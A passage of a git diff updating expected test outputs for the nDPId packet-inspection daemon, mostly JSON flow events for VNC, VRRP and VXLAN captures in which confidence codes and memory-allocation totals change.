-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111264364,"flow_last_seen":1476111264453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111264453,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111264364,"flow_last_seen":1476111264453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111264453,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111286462,"flow_last_seen":1476111286462,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1476111286462,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1476111286462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"EP7tAkntxOodxQGGCABFAAA0be5AAHQGRQJf7TDQwKgCbslnGvTjPDftAAAAAIACIAD7xAAAAgQFrAEDAwIBAQQC"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1476111286462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"xOodxQGGEP7tAkntCABFAAA0AmNAAIAGAADAqAJuX+0w0Br0yWdPW3mt4zw37oASIABT+gAAAgQFtAEDAwgBAQQC"} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3546,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1476111286499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111286499,"pkt":"EP7tAkntxOodxQGGCABFAAAobe9AAHQGRQ1f7TDQwKgCbslnGvTjPDfuT1t5rlAQQTpSNgAAAAAAAAAA"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3548,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111286462,"flow_last_seen":1476111286549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111286549,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00930{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1008,"flow_first_seen":1476111286462,"flow_last_seen":1476111290613,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":17966,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00929{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3543,"flow_first_seen":1476111264364,"flow_last_seen":1476111280884,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":64300,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3548,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111286462,"flow_last_seen":1476111286549,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111286549,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00930{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1008,"flow_first_seen":1476111286462,"flow_last_seen":1476111290613,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":17966,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00929{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3543,"flow_first_seen":1476111264364,"flow_last_seen":1476111280884,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":64300,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","packets-captured":4551,"packets-processed":4551,"total-skipped-flows":0,"total-l4-payload-len":82266,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1476111290613} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4551/4551 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6006598 bytes -~~ total memory freed........: 6006598 bytes -~~ total allocations/frees...: 122673/122673 +~~ total memory allocated....: 6140232 bytes +~~ total memory freed........: 6140232 bytes +~~ total allocations/frees...: 125435/125435 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 457 chars ~~ json string max len.......: 935 chars diff --git a/test/results/vrrp3.pcapng.out b/test/results/vrrp3.pcapng.out index 1f8f5ce8f..2be7fce17 100644 --- a/test/results/vrrp3.pcapng.out +++ b/test/results/vrrp3.pcapng.out @@ -2,14 +2,14 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"vrrp3.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1589370606456} 00534{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606456,"flow_last_seen":1589370606456,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606456,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1589370606456,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":82,"pkt_l4_len":24,"thread_ts_msec":1589370606456,"pkt":"MzMAAAASAABeAAIkgQAAJIbdbgAAAAAYcP\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAEjEkZAED6DQb\/oAAAAAAAAAAAAAAAAA2Ng=="} -00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606456,"flow_last_seen":1589370606456,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606456,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::12","l4_proto":112,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606456,"flow_last_seen":1589370606456,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606456,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::12","l4_proto":112,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} 00534{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606915,"flow_last_seen":1589370606915,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606915,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1589370606915,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":82,"pkt_l4_len":24,"thread_ts_msec":1589370606915,"pkt":"MzMAAAASAABeAAIkgQAAJIbdbgAAAAAYcP\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAEjEkaQED6C8c\/oAAAAAAAAAAAAAAAAA2Ng=="} -00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606915,"flow_last_seen":1589370606915,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606915,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::12","l4_proto":112,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589370606915,"flow_last_seen":1589370606915,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370606915,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::12","l4_proto":112,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1589370616409,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":82,"pkt_l4_len":24,"thread_ts_msec":1589370616409,"pkt":"MzMAAAASAABeAAIkgQAAJIbdbgAAAAAYcP\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAEjEkaQED6C8c\/oAAAAAAAAAAAAAAAAA2Ng=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1589370625308,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":82,"pkt_l4_len":24,"thread_ts_msec":1589370625308,"pkt":"MzMAAAASAABeAAIkgQAAJIbdbgAAAAAYcP\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAEjEkaQED6C8c\/oAAAAAAAAAAAAAAAAA2Ng=="} -00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1589370606915,"flow_last_seen":1589370680701,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370680701,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1589370606456,"flow_last_seen":1589370606456,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370680701,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00634{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1589370606915,"flow_last_seen":1589370680701,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370680701,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"vrrp3.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1589370606456,"flow_last_seen":1589370606456,"flow_idle_time":620000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1589370680701,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::12","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"vrrp3.pcapng","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":240,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1589370680701} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -19,9 +19,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870737 bytes -~~ total memory freed........: 5870737 bytes -~~ total allocations/frees...: 118126/118126 +~~ total memory allocated....: 6004371 bytes +~~ total memory freed........: 6004371 bytes +~~ total allocations/frees...: 120888/120888 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 639 chars diff --git a/test/results/vxlan.pcap.out b/test/results/vxlan.pcap.out index 4a2c972de..f48417d97 100644 --- a/test/results/vxlan.pcap.out +++ b/test/results/vxlan.pcap.out @@ -2,54 +2,54 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639650442645} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1639650442645,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639650442645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":126,"pkt_l4_len":88,"thread_ts_msec":1639650442645,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbAM\/AABAEcnowKgWBMCoFgXt1xK1AFhqBAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA6NbBAAEAR1uUKChQECAgICK2VADUAJhfikMYBAAABAAAAAAAACGZhY2Vib29rA2NvbQAAAQAB"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1639650442645,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1639650442645,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639650442645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":126,"pkt_l4_len":88,"thread_ts_msec":1639650442645,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbANAAABAEcnnwKgWBMCoFgXt1xK1AFhqBAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA6NbFAAEAR1uQKChQECAgICK2VADUAJoy+G88BAAABAAAAAAAACGZhY2Vib29rA2NvbQAAHAAB"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442682,"flow_last_seen":1639650442682,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639650442682,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639650442682,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":142,"pkt_l4_len":104,"thread_ts_msec":1639650442682,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAfK8cAABAER37wKgWBcCoFgSrWhK1AGit0wgAAAAABFcAHuppKm\/PZnpQqv+aCABFAABK7zAAAHgRJVUICAgICgoUBAA1rZUANljckMaBgAABAAEAAAAACGZhY2Vib29rA2NvbQAAAQABwAwAAQABAAAAPQAEnfDgIw=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442682,"flow_last_seen":1639650442682,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639650442682,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442682,"flow_last_seen":1639650442682,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639650442682,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 